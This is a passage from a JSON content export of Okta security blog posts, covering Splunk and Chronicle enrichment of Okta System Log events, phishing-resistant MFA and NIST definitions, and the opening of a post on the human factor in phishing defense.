Also, this new TA will be Splunk Cloud certified.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What Additional Information Do You Get?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As you search in Splunk for each of the System Log events defined in the .csv, this solution enriches them automatically with the following new fields, using the field format_event_type as a matching key.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"event_type_description\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The full-text description of the event.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"event_type_tags\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The various tags (pipe-delimited) that the event is categorized under, such as “admin” or “oauth2” or “workflows.”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"admin_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": A field set to “1” if the event is pertaining to admin-level activity, such as the modification of an email template, or the creation of an app sign-on 
policy.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": A field set to “1” if the event has particular security interest, such as the identification of a threat within ThreatInsight, or the start of a support technician impersonation session. This incorporates, and extends, the Okta Events categorization found here. (Note: events can be of both admin and security interest.)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"legacy_event_types\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The various former event types that mapped to this event, pipe-delimited.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once this lookup is loaded into Splunk, it can be viewed quickly via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.splunk.com/Documentation/Splunk/8.2.6/SearchReference/Inputlookup\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"inputlookup\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" command, as shown below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4PMcCaRBswZpkepQiwRnxx\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk console, using inputlookup command\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Leveraging the Additional 
Info\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With this lookup in place, Okta admins or security personnel searching this data in Splunk no longer have to pivot out of Splunk and view Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/event-types/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Type Catalog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to understand what an event means, or if it is of admin and/or security interest. Reports, dashboards, and detections can be created leveraging these new fields. Security teams in particular can easily build dashboards of Okta events that are of interest to them, and can create alerts or “notable events” from particularly important security events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As an example to get you started, also provided at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/stressboi/Okta-Identity-Cloud-for-Splunk/tree/Development\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"GitHub link\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" above is a usable dashboard that displays all events of admin or security interest. Multi-select dialogs at the top of the dashboard allow the viewer to select event categories and tags of interest, as well as free-form search the events returned. 
Here’s a screencap!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4JSffAVvKgAYwA5VonXu4B\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample Dashboard, using enriched events of interest\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“That’s Nice. But We Don’t Use Splunk….”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you don’t use Splunk, you may still leverage the .csv file in order to build your own parser or reference table for the SIEM or log management platform of your choice. We reached out to our friends at Google Cloud Security, who took the .csv file and built it into a new version of the parser that brings Okta System Logs into Google Chronicle.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle feeds operate much the same as feeds in any other SIEM. However, the capabilities and goals diverge quickly once the data is ingested. In Chronicle, the parser adds metadata fields and populates the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/reference/udm-field-list\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Data Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" fields needed for Chronicle operations to happen on the data. This happens at ingest time, so any time dependent data are added to the meta of that log and are able to persist over the life of the log. 
If we were to change the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"event_type_description\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" of a log at a later date, the values would remain the same for older logs and be updated for new logs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Operating within Chronicle, you can use both raw and structured search. When combined with the new fields \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"admin_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", structured search allows the operator to quickly select only the relevant logs using Procedural Filtering combined with Prevalence on domain, user, or asset occurrence. Without using a search language, the operator can also find the most frequently occurring username generating logs of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"security_interest\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". 
For more information on enrichment, check out the Chronicle documentation on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cloud.google.com/chronicle/docs/investigation/investigate-user\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"user investigation\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conclusion\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I hope this foray into enrichment methods helps you get even more use out of this valuable resource.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you create dashboards based on the additional fields, feel free to create a pull request against the Github project so that we can include it in the repo.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"And if you create enrichment capabilities for another SIEM, I’d love to hear about it - please DM me at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://twitter.com/james_brodsky\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"@james_brodsky\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:46:01.440Z","secAuthor":[{"id":"94d5712c-dbae-5810-960d-1cd7db5eaec6","bio":{"bio":"<p><span><span><span><span><span><span>I serve as a global resource for Okta’s high-growth solutions engineering organization. I have been at Okta since January, 2022 - but I’m no stranger to the industry! 
My team brings our customers a better awareness of Okta’s capabilities when it comes to protecting employees and business, increasing your security posture and giving your customers a frictionless-but-safe experience as they interact with you digitally</span></span></span></span></span></span><span><span><span><span><span><span>.</span></span></span></span></span></span></p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4S4G7LW5dJLeo3NJyYOBAr/489a0430a1099f23b7a480286a9e1d3f/james_brodsky_okta.png"},"name":"James Brodsky","jobTitle":"Senior Director, Systems Engineering","slug":"james-brodsky","node_locale":"en"}]},{"slug":"/articles/2022/09/phishing-resistance-and-why-it-matters","id":"35a1dca1-f3ac-5389-b641-5b224f6c05a7","title":"Phishing Resistance and Why it Matters","date":"2022-09-22T20:47:16+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the wake of recent security events at Uber and Twilio, organizations are understandably interested in pivoting to authenticators that offer the most resistance to phishing attacks. So what is phishing resistance, and why does it matter?\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential theft remains the primary means by which attackers gain unauthorized access to systems. In 2021, over 80 percent of successful attacks on web applications stemmed from credential-based attacks such as phishing, credential stuffing and password sprays. 
According to the not-for-profit Anti-Phishing Working Group, the first quarter of 2022 saw the highest rate of phishing attacks \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.apwg.org/reports/apwg_trends_report_q1_2022.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"on record (pdf)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", with financial services and cloud service providers being targeted the most often.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-factor authentication (MFA) remains the most effective form of protection against all forms of credential theft. MFA limits what an adversary can do with a stolen password, and creates numerous detection opportunities when an adversary attempts to bypass it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By definition, MFA combines authenticators from at least two different categories among the following (two authenticators of the same category, such as a password plus a PIN, do not constitute MFA):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"something you know (a knowledge factor)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"something you have (a possession factor)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"something you are (an inherence factor)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/datasheet-factor-assurance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"numerous authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" an Okta administrator can choose from to satisfy those properties in access policies. A spate of successful social engineering attacks has renewed interest in the degree to which any given authenticator is “phishing resistant”. But what exactly is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"phishing resistance\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Measuring resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing resistance can be viewed in relative or absolute terms. All authenticators offer \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/datasheet-factor-assurance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"varying degrees of resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to social engineering, as all authenticators impose costs and risks on adversaries seeking to take over an account. 
For example, Push authenticators offer greater resistance to static credential phishing campaigns than authenticators that rely on One Time Passwords (OTP).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Combining Push with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-okta-verify-options.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Number Challenge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which asks the user verifying a push request to identify a number presented on the sign-in page, offers resistance to a broader set of adversary techniques including \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/everythingisyes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“MFA Fatigue” attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But usually when somebody says “phishing resistant”, they are defining it in absolute terms and referring to authenticators that can withstand \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"real-time, AiTM phishing attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This narrows the number of authentication choices significantly.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most reliable definition for phishing resistance is maintained by the US National Institute of Standards and Technology (NIST). 
According to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-FAQ/#q-b04\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", phishing resistance requires that the channel being authenticated is cryptographically bound to the output of the authenticator. In more simple terms, this means that the domain (address) of the website you are signing in to is tied to your authenticator, to ensure it won't issue your credentials to a fake phishing web page.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Several authenticators available in Okta’s platform meet this definition. Okta supports roaming FIDO2 WebAuthn authenticators (security keys) and device-bound FIDO2 WebAuthn authenticators (e.g. FaceID, TouchID, Windows Hello) and also supports the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/08/okta-helps-federal-agencies-deploy-phishing-resistant-mfa/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"use of PIV smart cards as an “external IdP”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Depending on your deployment model, FastPass (Okta’s device-bound passwordless authenticator) also meets this definition.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But given the rate of change in operating systems, browsers and apps (not to mention the constant evolution of adversary tradecraft), it shouldn’t be left to administrators to work out what authentication flows are more or less resistant to phishing. 
That’s why Okta Identity Engine provides administrators the ability to create application assurance policies that can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"enforce\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" phishing resistance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5ggBWDlzYV6gcq9ZqQvNqc\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the policy above, for example, access to a particular set of applications is only allowed from a managed device using at least one authenticator that meets the NIST definition for phishing resistance. Over 1.5m Okta users have enrolled in phishing resistant authenticators like WebAuthN today. Early adopters like Figma have \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://twitter.com/frgx/status/1379504541666701313?s=20&t=c41cs60uEK5ReCa71dTnzw\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"rolled out\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" phishing resistant authenticators across their workforce.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Defense in depth\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Irrespective of your authenticator, your access policies should assume there will be scenarios in which a phishing resistant authenticator isn’t available for a given application or for a given user. 
That’s why we recommend a defense-in-depth approach to phishing prevention, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security awareness programs\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that teach users how to: Identify the emotive cues social engineers use to pressure users into acting abruptly; Identify suspicious variations on domains used in phishing websites; Report suspicious messages, websites or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"access requests\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to security teams.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Email and web filtering technologies\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that can identify and prevent employees from clicking on phishing emails or connecting to phishing websites.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Endpoint security software\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to protect against malware infection and identify browser-based attacks in which malware is hosted on phishing websites.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication 
policies\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that limit access to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted networks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/guides/devices/devcontext-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", with maximum and idle session durations based on the criticality of the application. NIST’s Authenticator Assurance Levels (SP 800-63B) are a good guide; re-authentication is required when either limit is reached, whichever comes first:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AAL1 applications: 30 days maximum\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AAL2 applications: 12 hours maximum AND 30 minutes idle\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AAL3 applications: 12 hours maximum AND 15 minutes idle\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection and response\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" programs that proactively identify phishing websites, identify anomalous login activities and provide an ability to respond to 
phishing campaigns in-flight.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We will provide more details on how Okta features can be incorporated into your security awareness and detection and response programs in later blog posts in this series.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:38:56.695Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. <br/> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. 
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2022/10/human-factor-phishing-resistance","id":"ee1329b1-31e3-5601-986e-3b641d8c3a2d","title":"The Human Factor in Phishing Resistance","date":"2022-10-05T20:23:27+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the wake of recent security events at Uber and Twilio, organizations are understandably interested in \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pivoting to authenticators\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that offer the most resistance to phishing attacks. 
In this second part of our series on phishing resistance, we consider the human element.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All organizations should aspire to a state in which technical and operational controls reduce the burden on end users to identify and respond appropriately to social engineering.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Large numbers of Okta customers are pivoting toward phishing resistant authenticators, as we discussed \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"in part one\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of this series. Many Okta customers have chosen to limit all user authentication to phishing resistant factors. Typically these are leading edge organizations, “born in the cloud”, that are not locked into legacy technologies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s mission is to enable anyone to use any technology. So we recognize that, by necessity, organizations encumbered by legacy apps will need to support a mix of authenticators for some time into the future. Our policy engine is designed such that these organizations can enforce phishing resistance where it matters most, and only allow weaker (less phishing resistant) authenticators by exception.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So for most organizations, there remains a need to empower users in the fight against phishing. 
User empowerment can take many forms, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Providing users with sufficient context whenever they sign-in\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensuring users are aware of common social engineering techniques\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Providing users with the tools to report suspicious requests\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The power of context\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/scatterswine\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Scatter Swine attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of July and August 2022 demonstrated one of the critical limitations in authentication flows that use passwords and OTP (one time password) authenticators. An authentication flow that requires an OTP doesn’t provide opportunities for the user to assess context about the origin of a request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A push request can provide this context. 
